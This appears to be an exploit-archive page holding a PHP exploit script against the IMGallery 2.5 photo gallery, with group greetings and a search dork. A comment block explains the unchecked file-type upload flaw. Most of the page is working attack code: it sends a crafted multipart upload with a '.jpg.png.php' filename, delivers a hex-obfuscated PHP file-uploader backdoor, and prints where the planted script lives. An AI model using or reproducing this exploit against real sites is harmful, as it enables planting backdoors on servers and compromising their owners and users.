IMGallery <= 2.5 Create Uploader Script Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : IMGallery <= 2.5 Create Uploader Script Exploit
# Published : 2006-12-30
# Author : Kacper
# Previous Title : Click N Print Coupons <= V2006.01 (key) Remote SQL Injection Exploit
# Next Title : Enigma 2 Coppermine Bridge (boarddir) Remote File Include Vulnerability
<?

//Kacper Settings 
$exploit_name = "IMGallery <= 2.5 Create Uploader Script Exploit";
$script_name = "IMGallery 2.5";
$script_site = "http://www.imgallery.zor.pl/";
$dork = '"Powered by IMGallery"';
//**************************************************************


print '
:::::::::  :::::::::: :::     ::: ::::::::::: :::        
:+:    :+: :+:        :+:     :+:     :+:     :+:        
+:+    +:+ +:+        +:+     +:+     +:+     +:+        
+#+    +:+ +#++:++#   +#+     +:+     +#+     +#+        
+#+    +#+ +#+         +#+   +#+      +#+     +#+        
#+#    #+# #+#          #+#+#+#       #+#     #+#        
#########  ##########     ###     ########### ########## 
::::::::::: ::::::::::     :::     ::::    ::::  
    :+:     :+:          :+: :+:   +:+:+: :+:+:+ 
    +:+     +:+         +:+   +:+  +:+ +:+:+ +:+ 
    +#+     +#++:++#   +#++:++#++: +#+  +:+  +#+ 
    +#+     +#+        +#+     +#+ +#+       +#+ 
    #+#     #+#        #+#     #+# #+#       #+# 
    ###     ########## ###     ### ###       ### 
	
   - - [DEVIL TEAM THE BEST POLISH TEAM] - -
 

[Exploit name: '.$exploit_name.'
[Script name: '.$script_name.'
[Script site: '.$script_site.'
dork: '.$dork.'

Find by: Kacper (a.k.a Rahim)


========>  DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam  <========
========>         http://www.rahim.webd.pl/            <========

Contact: kacper1964@yahoo.pl

(c)od3d by Kacper
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Greetings DragonHeart and all DEVIL TEAM Patriots :)
- Leito & Leon | friend str0ke ;)

Blund Coder, D0han, d3m0n, D3m0n (ziom z Niemiec :P), dn0de, DUREK5, fdj, Grzegorz, GrZyB997, konsol, Mandr4ke,
mass, michalind, mIvus, Nua, nukedclx, pepi, QunZ, Qw3rty, RebeL, SkD, Adam, arkadius, asteroid, blue, Ci2u, CrazzyIwan,
DMX, drzewko, ExTrEmE][-][ack, Gelo, Kicaj, Larry, Leito, LEON, Michas, Morpheus, MXZ, Ramzes, redsaq, TomZen

 and
 
Dr Max Virus
TamTurk,
hackersecurity.org

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
                Greetings for 4ll Fusi0n Group members ;-)
                and all members of hacker.com.pl ;)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
';


/*

Exploit works only when in script user can upload own photos :)

~~~~~~~~~~~~~
in file users_adm/start1.php:
....
$rozm = $_FILES['obraz']['size'];
if($rozm > $wielkosc_pliku) {header("Location: start.php?kategoria_form=$kategoria_form&info=101&karet=$karet&PHPSESSID=$s_id"); exit;}

//ustala typ mime pliku i tworzy odpowiedni prefix dla funkcji GD
$typ_pliku = $_FILES['obraz']['type'];



switch($typ_pliku)             //<------------{1}
        {
                case 'image/jpeg':
                        $pref_gd = "jpeg";
                        break;
                case 'image/png':
                        $pref_gd = "png";
                        break;
               case 'image/pjpeg':
                        $pref_gd = "jpeg";
                        break;
        }



//koniec ustala typ mime pliku i tworzy odpowiedni prefix dla funkcji GD


$nazwa1 = Date("His");//wykorzystanie daty do wygenerowania nowej nazwy dla pliku         //<------------{2}
$nazwa2 = $_FILES['obraz']['name'];//pobranie nazwy pliku z tablicy
$nazwa_zmieniona = "$nazwa1$nazwa2";//po3±czenie daty z nazw± pliku  //<------------{3}

//zamienia polskie litery z jêzyczkami aby nie znalaz3y siê w nazwie fotki
$nazwa_zmieniona = strtolower($nazwa_zmieniona);
$nazwa_zmieniona = ereg_replace(" ","_",$nazwa_zmieniona);
$nazwa_zmieniona = ereg_replace("±","a",$nazwa_zmieniona);
$nazwa_zmieniona = ereg_replace("ê","e",$nazwa_zmieniona);
$nazwa_zmieniona = ereg_replace("?","z",$nazwa_zmieniona);
$nazwa_zmieniona = ereg_replace("?","z",$nazwa_zmieniona);
$nazwa_zmieniona = ereg_replace("ó","o",$nazwa_zmieniona);
$nazwa_zmieniona = ereg_replace("3","l",$nazwa_zmieniona);
$nazwa_zmieniona = ereg_replace("?","s",$nazwa_zmieniona);
$nazwa_zmieniona = ereg_replace("|","s",$nazwa_zmieniona);
$nazwa_zmieniona = ereg_replace("?","c",$nazwa_zmieniona);

$file = "../obrazy/".$nazwa_zmieniona.""; //dodaje adres i nazwê zdjêcia do zmiennej, która jet tak?e wykorzystywana podczas tworzenia miniatury w pliku create_min

move_uploaded_file($_FILES['obraz']['tmp_name'],"../obrazy/".$nazwa_zmieniona);//wgrywa plik na serwer     //<------------{4}

chmod($file, 0755);
....

we can upload file *.php
np. hauru.jpg.png.php  <---- :)

script rename file to:
....
$nazwa1 = Date("His");//wykorzystanie daty do wygenerowania nowej nazwy dla pliku 
$nazwa2 = $_FILES['obraz']['name'];//pobranie nazwy pliku z tablicy
$nazwa_zmieniona = "$nazwa1$nazwa2";//po3±czenie daty z nazw± pliku
....

to check correct name of file:
<?
$nazwa1 = Date("His");//wykorzystanie daty do wygenerowania nowej nazwy dla pliku
$nazwa2 = "hauru.jpg.png.php";
echo "$nazwa1$nazwa2";//po3±czenie daty z nazw± pliku
?>

to find you uploaded file go to:

http://site.com/IMGallery path/obrazy/(youfile)

greetz ;)
*/
if ($argc<4) {
print_r('
-----------------------------------------------------------------------------
Usage: php '.$argv[0].' host path session_id OPTIONS
host:       target server (ip/hostname)
path:       IMGallery path
session id: you user sessionid
Options:
 -p[port]:    specify a port other than 80
 -P[ip:port]: specify a proxy
Example:
php '.$argv[0].' 127.0.0.1 /IMGallery/ 098ab38d17e71de55c7e9993c26d3998
php '.$argv[0].' 127.0.0.1 /IMGallery/ 098ab38d17e71de55c7e9993c26d3998 -P1.1.1.1:80
-----------------------------------------------------------------------------
');

die;
}

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="rn"; $exa.="rn";}
  }
 return $exa."rn".$result;
}
$proxy_regex = '(bd{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}b)';
function sendpacket($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...rn";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
	}
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
}
function make_seed()
{
   list($usec, $sec) = explode(' ', microtime());
   return (float) $sec + ((float) $usec * 100000);
}

$host=$argv[1];
$path=$argv[2];
$sid=$argv[3];


$port=80;
$proxy="";
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$hauru=
"x3cx3fx70x68x70x20x0dx0ax69x66x28x69x73x73x65x74".
"x28x24x5fx50x4fx53x54x5bx27x75x70x6cx5fx66x69x6c".
"x65x73x27x5dx29x29x7bx20x0dx0ax20x20x65x63x68x6f".
"x20x27x62x75x74x74x6fx6ex20x63x6cx69x63x6bx65x64".
"x27x3bx20x0dx0ax20x20x2fx2fx70x72x69x6ex74x5fx72".
"x28x24x5fx46x49x4cx45x53x5bx27x66x69x6cx65x5fx6e".
"x27x5dx29x3bx20x0dx0ax20x20x65x63x68x6fx20x27x3c".
"x68x72x3ex27x3bx20x0dx0ax20x20x24x75x70x5fx6dx61".
"x73x20x3dx20x24x5fx46x49x4cx45x53x5bx27x66x69x6c".
"x65x5fx6ex27x5dx3bx20x0dx0ax20x20x24x6dx61x73x5f".
"x6ex61x6dx65x20x3dx20x61x72x72x61x79x28x29x3bx20".
"x0dx0ax20x20x24x6dx61x73x5fx74x6dx70x20x3dx20x61".
"x72x72x61x79x28x29x3bx20x0dx0ax20x20x66x6fx72x28".
"x24x69x3dx30x3bx20x24x69x3cx31x30x3bx20x24x69x2b".
"x2bx29x7bx20x0dx0ax20x20x20x20x69x66x28x21x65x6d".
"x70x74x79x28x24x75x70x5fx6dx61x73x5bx27x6ex61x6d".
"x65x27x5dx5bx24x69x5dx29x29x7bx20x0dx0ax20x20x20".
"x20x20x20x24x6ax20x3dx20x63x6fx75x6ex74x28x24x6d".
"x61x73x5fx6ex61x6dx65x29x3bx20x0dx0ax20x20x20x20".
"x20x20x24x6dx61x73x5fx6ex61x6dx65x5bx24x6ax5dx20".
"x3dx20x24x75x70x5fx6dx61x73x5bx27x6ex61x6dx65x27".
"x5dx5bx24x69x5dx3bx20x0dx0ax20x20x20x20x20x20x24".
"x6dx61x73x5fx74x6dx70x5bx24x6ax5dx20x3dx20x24x75".
"x70x5fx6dx61x73x5bx27x74x6dx70x5fx6ex61x6dx65x27".
"x5dx5bx24x69x5dx3bx20x0dx0ax20x20x20x20x20x20x7d".
"x20x0dx0ax20x20x20x20x7dx20x0dx0ax20x20x66x6fx72".
"x28x24x69x3dx30x3bx20x24x69x3cx63x6fx75x6ex74x28".
"x24x6dx61x73x5fx6ex61x6dx65x29x3bx20x24x69x2bx2b".
"x29x7bx20x0dx0ax20x20x20x20x24x75x70x6cx5fx66x69".
"x6cx65x20x3dx20x27x2ex2fx27x2ex24x6dx61x73x5fx6e".
"x61x6dx65x5bx24x69x5dx3bx20x0dx0ax20x20x20x20x69".
"x66x28x6dx6fx76x65x5fx75x70x6cx6fx61x64x65x64x5f".
"x66x69x6cx65x28x24x6dx61x73x5fx74x6dx70x5bx24x69".
"x5dx2cx20x24x75x70x6cx5fx66x69x6cx65x29x29x7bx20".
"x0dx0ax20x20x20x20x20x20x65x63x68x6fx20x27x3cx61".
"x20x68x72x65x66x3dx22x27x2ex24x6dx61x73x5fx6ex61".
"x6dx65x5bx24x69x5dx2ex27x22x3ex27x2ex24x6dx61x73".
"x5fx6ex61x6dx65x5bx24x69x5dx2ex27x3cx2fx61x3ex3c".
"x62x72x3ex27x3bx20x0dx0ax20x20x20x20x20x20x7dx20".
"x0dx0ax20x20x20x20x7dx20x0dx0ax20x20x7dx20x0dx0a".
"x3fx3ex20x0dx0ax0dx0ax3cx66x6fx72x6dx20x65x6ex63".
"x74x79x70x65x3dx22x6dx75x6cx74x69x70x61x72x74x2f".
"x66x6fx72x6dx2dx64x61x74x61x22x20x6dx65x74x68x6f".
"x64x3dx22x70x6fx73x74x22x20x61x63x74x69x6fx6ex3d".
"x22x22x3ex20x0dx0ax3cx64x69x76x20x73x74x79x6cx65".
"x3dx22x70x61x64x64x69x6ex67x3ax20x31x30x70x78x3b".
"x20x62x6fx72x64x65x72x3ax20x31x70x78x20x73x6fx6c".
"x69x64x20x23x63x63x63x63x63x63x3bx20x77x69x64x74".
"x68x3ax20x33x30x30x70x78x3bx22x3ex20x0dx0ax3cx3f".
"x70x68x70x20x0dx0ax20x20x66x6fx72x28x24x69x3dx30".
"x3bx20x24x69x3cx31x30x3bx20x24x69x2bx2bx29x7bx20".
"x0dx0ax20x20x20x20x65x63x68x6fx20x27x3cx70x3ex3c".
"x69x6ex70x75x74x20x74x79x70x65x3dx22x66x69x6cx65".
"x22x20x6ex61x6dx65x3dx22x66x69x6cx65x5fx6ex5bx5d".
"x22x3ex3cx2fx70x3ex27x3bx20x0dx0ax20x20x20x20x7d".
"x20x0dx0ax3fx3ex20x0dx0ax3cx2fx64x69x76x3ex20x0d".
"x0ax3cx64x69x76x20x73x74x79x6cx65x3dx22x70x61x64".
"x64x69x6ex67x3ax20x31x30x70x78x3bx20x62x6fx72x64".
"x65x72x3ax20x31x70x78x20x73x6fx6cx69x64x20x23x63".
"x63x63x63x63x63x3bx20x6dx61x72x67x69x6ex2dx74x6f".
"x70x3ax20x31x30x70x78x3bx20x77x69x64x74x68x3ax20".
"x33x30x30x70x78x3bx22x3ex20x0dx0ax20x20x3cx69x6e".
"x70x75x74x20x74x79x70x65x3dx22x73x75x62x6dx69x74".
"x22x20x6ex61x6dx65x3dx22x75x70x6cx5fx66x69x6cx65".
"x73x22x20x76x61x6cx75x65x3dx22x75x70x6cx6fx61x64".
"x22x3ex20x0dx0ax3cx2fx64x69x76x3ex20x0dx0ax3cx2f".
"x66x6fx72x6dx3ex20";
$data.='---------------------------7d61bcd1f033e
Content-Disposition: form-data; name="urljump"

start.php?kategoria_form=2&PHPSESSID='.$sid.'
---------------------------7d61bcd1f033e
Content-Disposition: form-data; name="obraz"; filename="hauru.jpg.png.php"
Content-Type: text/plain

'.$hauru.'
---------------------------7d61bcd1f033e
Content-Disposition: form-data; name="opis"

DEVIL TEAM ;-)
---------------------------7d61bcd1f033e
Content-Disposition: form-data; name="submit"

Dodaj
---------------------------7d61bcd1f033e--';
echo "You date code1:n";
echo Date("His");
echo "n";
$tim1 = Date("His");
echo "upload Hauru!! (step 1)...n";
$packet ="POST ".$p."users_adm/start.php?kategoria_form=2&PHPSESSID=".$sid." HTTP/1.0rn";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*rn";
$packet.="Cookie: PHPSESSID=".$sid.";rn";
$packet.="Cookie: odwiedziny=zaliczone;rn";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033ern";
$packet.="Content-Length: ".strlen($data)."rn";
$packet.="Host: ".$host."rn";
$packet.="Connection: Closernrn";
$packet.=$data;
sendpacket($packet);
echo "You date code2:n";
echo Date("His");
$tim2 = Date("His");
sleep(1);
echo "n";
echo "check you localisation of upload script: $tim1n";
echo 'Find you upload script: http://'.$host.$path.'obrazy/'.$tim2.'hauru.jpg.png.php';
echo "n";
echo "or search between $tim1 and $tim2n";
echo "n";
echo "Go to DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteamrn";
?>

# www.Syue.com [2006-12-30]